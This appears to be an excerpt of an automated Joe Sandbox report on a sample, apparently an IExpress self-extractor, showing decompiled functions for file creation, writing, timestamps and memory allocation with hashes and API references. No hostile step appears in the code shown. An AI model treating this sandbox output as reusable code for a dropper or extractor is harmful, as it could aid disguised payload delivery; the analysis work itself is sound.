                                                                                                                                                                                                        0x00214d2a
                                                                                                                                                                                                        0x00214d2d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00214d2d
                                                                                                                                                                                                        0x00214cf8
                                                                                                                                                                                                        0x00214cfd
                                                                                                                                                                                                        0x00214d02
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00214DB5
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00214DDD
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AttributesFileItemText
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                        • API String ID: 3625706803-1116576409
                                                                                                                                                                                                        • Opcode ID: 98452341467ea9332dd856b82588a0831e523b2b1958fdc6cd534de33100e8d6
                                                                                                                                                                                                        • Instruction ID: 342c11ae0db56a629c0f58823cbd009badf0c69fccfb52c5391a441f7f3dd34e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 98452341467ea9332dd856b82588a0831e523b2b1958fdc6cd534de33100e8d6
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B84125362201039BCF25BF28E8586F673E5EB75300B148669D88E97181DE31EEE6CB50
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00214C37 Relevance: 4.5, APIs: 3, Instructions: 39timeCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00214C37(signed int __ecx, int __edx, int _a4) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				FILETIME* _t14;
				int _t15;
				signed int _t21;

				_t21 = __ecx * 0x18;
				if( *((intOrPtr*)(_t21 + 0x218d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
					L5:
					return 0;
				} else {
					_t14 =  &_v12;
					_t15 = SetFileTime( *(_t21 + 0x218d74), _t14, _t14, _t14); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 1;
				}
			}








                                                                                                                                                                                                        0x00214c40
                                                                                                                                                                                                        0x00214c4a
                                                                                                                                                                                                        0x00214c8d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00214c70
                                                                                                                                                                                                        0x00214c70
                                                                                                                                                                                                        0x00214c7e
                                                                                                                                                                                                        0x00214c86
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00214c8a

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • DosDateTimeToFileTime.KERNEL32 ref: 00214C54
                                                                                                                                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00214C66
                                                                                                                                                                                                        • SetFileTime.KERNELBASE(?,?,?,?), ref: 00214C7E
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Time$File$DateLocal
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2071732420-0
                                                                                                                                                                                                        • Opcode ID: c8c039ea3e857c7393aeb428f6e2cfca7df951b7101cbbbbb54aa698b68091ee
                                                                                                                                                                                                        • Instruction ID: 453f7dffdaa90e542c94689ddb07ebd2f021968cfc082bd073a35f6e032dca87
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c8c039ea3e857c7393aeb428f6e2cfca7df951b7101cbbbbb54aa698b68091ee
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 05F0627251120AAA9B14AFB4DC49DFB77ECEB24340744453BA519C1050EA31D964C7A0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 0021487A Relevance: 3.1, APIs: 2, Instructions: 59fileCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                        			E0021487A(CHAR* __ecx, signed int __edx) {
				void* _t7;
				CHAR* _t11;
				long _t18;
				long _t23;

				_t11 = __ecx;
				asm("sbb edi, edi");
				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
				if((__edx & 0x00000100) == 0) {
					asm("sbb esi, esi");
					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
				} else {
					if((__edx & 0x00000400) == 0) {
						asm("sbb esi, esi");
						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
					} else {
						_t23 = 1;
					}
				}
				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
				if(_t7 != 0xffffffff || _t23 == 3) {
					return _t7;
				} else {
					E0021490C(_t11);
					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
				}
			}







                                                                                                                                                                                                        0x00214880
                                                                                                                                                                                                        0x0021488c
                                                                                                                                                                                                        0x00214894
                                                                                                                                                                                                        0x002148a0
                                                                                                                                                                                                        0x002148c9
                                                                                                                                                                                                        0x002148ce
                                                                                                                                                                                                        0x002148a2
                                                                                                                                                                                                        0x002148a8
                                                                                                                                                                                                        0x002148b7
                                                                                                                                                                                                        0x002148bc
                                                                                                                                                                                                        0x002148aa
                                                                                                                                                                                                        0x002148ac
                                                                                                                                                                                                        0x002148ac
                                                                                                                                                                                                        0x002148a8
                                                                                                                                                                                                        0x002148de
                                                                                                                                                                                                        0x002148e7
                                                                                                                                                                                                        0x0021490b
                                                                                                                                                                                                        0x002148ee
                                                                                                                                                                                                        0x002148f0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00214902

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00214A23,?,00214F67,*MEMCAB,00008000,00000180), ref: 002148DE
                                                                                                                                                                                                        • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00214F67,*MEMCAB,00008000,00000180), ref: 00214902
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                        • Opcode ID: 3853d35609e9c3688eb279a707a8dc18757ba92d1400faf230d8562a8ebfe274
                                                                                                                                                                                                        • Instruction ID: a342dcf724b5ca4a8f0417a10dd9531e736bce61c8c1fccba9f0071cb316d8b8
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3853d35609e9c3688eb279a707a8dc18757ba92d1400faf230d8562a8ebfe274
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B3014BA3E2257026F32460295C89FF7559CCBA6734F1B0335BDAEEB1D1D5645C5481E0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00214AD0 Relevance: 3.0, APIs: 2, Instructions: 47fileCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E00214AD0(signed int _a4, void* _a8, long _a12) {
				signed int _t9;
				int _t12;
				signed int _t14;
				signed int _t15;
				void* _t20;
				struct HWND__* _t21;
				signed int _t24;
				signed int _t25;

				_t20 =  *0x21858c; // 0x268
				_t9 = E00213680(_t20);
				if( *0x2191d8 == 0) {
					_push(_t24);
					_t12 = WriteFile( *(0x218d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
					if(_t12 != 0) {
						_t25 = _a12;
						if(_t25 != 0xffffffff) {
							_t14 =  *0x219400; // 0x783b9
							_t15 = _t14 + _t25;
							 *0x219400 = _t15;
							if( *0x218184 != 0) {
								_t21 =  *0x218584; // 0x0
								if(_t21 != 0) {
									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x2193f8, 0);
								}
							}
						}
					} else {
						_t25 = _t24 | 0xffffffff;
					}
					return _t25;
				} else {
					return _t9 | 0xffffffff;
				}
			}











                                                                                                                                                                                                        0x00214ad5
                                                                                                                                                                                                        0x00214adb
                                                                                                                                                                                                        0x00214ae7
                                                                                                                                                                                                        0x00214aee
                                                                                                                                                                                                        0x00214b05
                                                                                                                                                                                                        0x00214b0d
                                                                                                                                                                                                        0x00214b14
                                                                                                                                                                                                        0x00214b1a
                                                                                                                                                                                                        0x00214b1c
                                                                                                                                                                                                        0x00214b21
                                                                                                                                                                                                        0x00214b2a
                                                                                                                                                                                                        0x00214b2f
                                                                                                                                                                                                        0x00214b31
                                                                                                                                                                                                        0x00214b39
                                                                                                                                                                                                        0x00214b54
                                                                                                                                                                                                        0x00214b54
                                                                                                                                                                                                        0x00214b39
                                                                                                                                                                                                        0x00214b2f
                                                                                                                                                                                                        0x00214b0f
                                                                                                                                                                                                        0x00214b0f
                                                                                                                                                                                                        0x00214b0f
                                                                                                                                                                                                        0x00214b5e
                                                                                                                                                                                                        0x00214ae9
                                                                                                                                                                                                        0x00214aed
                                                                                                                                                                                                        0x00214aed

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00213680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0021369F
                                                                                                                                                                                                          • Part of subcall function 00213680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 002136B2
                                                                                                                                                                                                          • Part of subcall function 00213680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 002136DA
                                                                                                                                                                                                        • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00214B05
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1084409-0
                                                                                                                                                                                                        • Opcode ID: 1f658559dbf521c4ed1dd7fdcd11f9c84c364cc06e3d85feb4150b22e866bcee
                                                                                                                                                                                                        • Instruction ID: eb227cd6b8516d08b0ad7ab5cf2a8d67120584c6cb1a6767060fb08a5a9eca59
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1f658559dbf521c4ed1dd7fdcd11f9c84c364cc06e3d85feb4150b22e866bcee
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8F01AD31610201ABD7049F28EC59BE27799EB64729F04C225E93D9A1E0CF70C9A1CB40
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 0021658A Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E0021658A(char* __ecx, void* __edx, char* _a4) {
				intOrPtr _t4;
				char* _t6;
				char* _t8;
				void* _t10;
				void* _t12;
				char* _t16;
				intOrPtr* _t17;
				void* _t18;
				char* _t19;

				_t16 = __ecx;
				_t10 = __edx;
				_t17 = __ecx;
				_t1 = _t17 + 1; // 0x218b3f
				_t12 = _t1;
				do {
					_t4 =  *_t17;
					_t17 = _t17 + 1;
				} while (_t4 != 0);
				_t18 = _t17 - _t12;
				_t2 = _t18 + 1; // 0x218b40
				if(_t2 < __edx) {
					_t19 = _t18 + __ecx;
					if(_t19 > __ecx) {
						_t8 = CharPrevA(__ecx, _t19); // executed
						if( *_t8 != 0x5c) {
							 *_t19 = 0x5c;
							_t19 =  &(_t19[1]);
						}
					}
					_t6 = _a4;
					 *_t19 = 0;
					while( *_t6 == 0x20) {
						_t6 = _t6 + 1;
					}
					return E002116B3(_t16, _t10, _t6);
				}
				return 0x8007007a;
			}












                                                                                                                                                                                                        0x00216592
                                                                                                                                                                                                        0x00216594
                                                                                                                                                                                                        0x00216596
                                                                                                                                                                                                        0x00216598
                                                                                                                                                                                                        0x00216598
                                                                                                                                                                                                        0x0021659b
                                                                                                                                                                                                        0x0021659b
                                                                                                                                                                                                        0x0021659d
                                                                                                                                                                                                        0x0021659e
                                                                                                                                                                                                        0x002165a2
                                                                                                                                                                                                        0x002165a4
                                                                                                                                                                                                        0x002165a9
                                                                                                                                                                                                        0x002165b2
                                                                                                                                                                                                        0x002165b6
                                                                                                                                                                                                        0x002165ba
                                                                                                                                                                                                        0x002165c3
                                                                                                                                                                                                        0x002165c5
                                                                                                                                                                                                        0x002165c8
                                                                                                                                                                                                        0x002165c8
                                                                                                                                                                                                        0x002165c3
                                                                                                                                                                                                        0x002165c9
                                                                                                                                                                                                        0x002165cc
                                                                                                                                                                                                        0x002165d2
                                                                                                                                                                                                        0x002165d1
                                                                                                                                                                                                        0x002165d1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002165dc
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharPrevA.USER32(00218B3E,00218B3F,00000001,00218B3E,-00000003,?,002160EC,00211140,?), ref: 002165BA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CharPrev
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 122130370-0
                                                                                                                                                                                                        • Opcode ID: 31931ba4141faa4e1b401f9655a40839bce5cfb3bf1d03be7f8bbb1ed0d425b1
                                                                                                                                                                                                        • Instruction ID: a8ef7e80eecadaa5891d8ebda16856471c073eaf24fd7dc54ac5b53fe73a9f0b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 31931ba4141faa4e1b401f9655a40839bce5cfb3bf1d03be7f8bbb1ed0d425b1
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CEF042321142517BD3310D1D988CBEEBFDF9BA5350F64415EE8DEC3205CAA54CD583A4
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 0021621E Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E0021621E() {
				signed int _v8;
				char _v268;
				signed int _t5;
				void* _t9;
				void* _t13;
				void* _t19;
				void* _t20;
				signed int _t21;

				_t5 =  *0x218004; // 0x58ac7c6d
				_v8 = _t5 ^ _t21;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					0x4f0 = 2;
					_t9 = E0021597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
				} else {
					E002144B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
					 *0x219124 = E00216285();
					_t9 = 0;
				}
				return E00216CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
			}











                                                                                                                                                                                                        0x00216229
                                                                                                                                                                                                        0x00216230
                                                                                                                                                                                                        0x00216247
                                                                                                                                                                                                        0x0021626a
                                                                                                                                                                                                        0x00216272
                                                                                                                                                                                                        0x00216249
                                                                                                                                                                                                        0x00216255
                                                                                                                                                                                                        0x0021625f
                                                                                                                                                                                                        0x00216264
                                                                                                                                                                                                        0x00216264
                                                                                                                                                                                                        0x00216284

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0021623F
                                                                                                                                                                                                          • Part of subcall function 002144B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00214518
                                                                                                                                                                                                          • Part of subcall function 002144B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00214554
                                                                                                                                                                                                          • Part of subcall function 00216285: GetLastError.KERNEL32(00215BBC), ref: 00216285
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 381621628-0
                                                                                                                                                                                                        • Opcode ID: d1a8111a74f7a1ce86ed7d89f4b5bf9212413317ebb063c525a84b66fbe0e20e
                                                                                                                                                                                                        • Instruction ID: 9274724b459608e52c548e3def425e26043655fdc303a425771f006a8237c9a7
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d1a8111a74f7a1ce86ed7d89f4b5bf9212413317ebb063c525a84b66fbe0e20e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4AF0B4B0610208ABD750EF749D0ABFE36ECDB74700F50446AA989D6081DD749DE48A90
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00214B60 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00214B60(signed int _a4) {
				signed int _t9;
				signed int _t15;

				_t15 = _a4 * 0x18;
				if( *((intOrPtr*)(_t15 + 0x218d64)) != 1) {
					_t9 = FindCloseChangeNotification( *(_t15 + 0x218d74)); // executed
					if(_t9 == 0) {
						return _t9 | 0xffffffff;
					}
					 *((intOrPtr*)(_t15 + 0x218d60)) = 1;
					return 0;
				}
				 *((intOrPtr*)(_t15 + 0x218d60)) = 1;
				 *((intOrPtr*)(_t15 + 0x218d68)) = 0;
				 *((intOrPtr*)(_t15 + 0x218d70)) = 0;
				 *((intOrPtr*)(_t15 + 0x218d6c)) = 0;
				return 0;
			}





                                                                                                                                                                                                        0x00214b66
                                                                                                                                                                                                        0x00214b74
                                                                                                                                                                                                        0x00214b98
                                                                                                                                                                                                        0x00214ba0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00214bac
                                                                                                                                                                                                        0x00214ba4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00214ba4
                                                                                                                                                                                                        0x00214b78
                                                                                                                                                                                                        0x00214b7e
                                                                                                                                                                                                        0x00214b84
                                                                                                                                                                                                        0x00214b8a
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00214FA1,00000000), ref: 00214B98
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2591292051-0
                                                                                                                                                                                                        • Opcode ID: 60530d2272302256f97b96e002d1123f82ff6d8e1677eea5fe204243fa690f3e
                                                                                                                                                                                                        • Instruction ID: 1978dd2deb2dad51b95fe74e67a3d8e2b0f3ebae75a43111e6572136e6ddcdc5
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 60530d2272302256f97b96e002d1123f82ff6d8e1677eea5fe204243fa690f3e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3BF0FE71914B08DE47619F39EC81BD2BBE5ABB5364330092BD46ED21D0DB70A551CBD0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 002166AE Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E002166AE(CHAR* __ecx) {
				unsigned int _t1;

				_t1 = GetFileAttributesA(__ecx); // executed
				if(_t1 != 0xffffffff) {
					return  !(_t1 >> 4) & 0x00000001;
				} else {
					return 0;
				}
			}




                                                                                                                                                                                                        0x002166b1
                                                                                                                                                                                                        0x002166ba
                                                                                                                                                                                                        0x002166c7
                                                                                                                                                                                                        0x002166bc
                                                                                                                                                                                                        0x002166be
                                                                                                                                                                                                        0x002166be

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(?,00214777,?,00214E38,?), ref: 002166B1
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                                                        • Opcode ID: 9a2bcf2863186516d6b59fe66cc0bf7408e846d5e421ccd9740508ef00264121
                                                                                                                                                                                                        • Instruction ID: 876ffd7b58d3ac24d274fa4b56968945db051f298516ac080491dc93452c8182
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9a2bcf2863186516d6b59fe66cc0bf7408e846d5e421ccd9740508ef00264121
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F1B0927A232482426A204A757C2D69A2885A6E123A7E45B90F032C01E0CE3EC896D004
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00214CA0 Relevance: 1.3, APIs: 1, Instructions: 8memoryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00214CA0(long _a4) {
				void* _t2;

				_t2 = GlobalAlloc(0, _a4); // executed
				return _t2;
			}




                                                                                                                                                                                                        0x00214caa
                                                                                                                                                                                                        0x00214cb1

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GlobalAlloc.KERNELBASE(00000000,?), ref: 00214CAA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AllocGlobal
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3761449716-0
                                                                                                                                                                                                        • Opcode ID: 551bd46fb85d2edd95597a25907424c7a62489eb8216c5ed74b661dd045d235c
                                                                                                                                                                                                        • Instruction ID: 7423b492707bd41d5df6a435b7ca81262eee6cd2917e48cb4ddfe8f296ef6f70
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 551bd46fb85d2edd95597a25907424c7a62489eb8216c5ed74b661dd045d235c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CAB09232044208B7CB001A82A809B853F19E788661F144010F60C450508A6294108696
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00214CC0 Relevance: 1.3, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
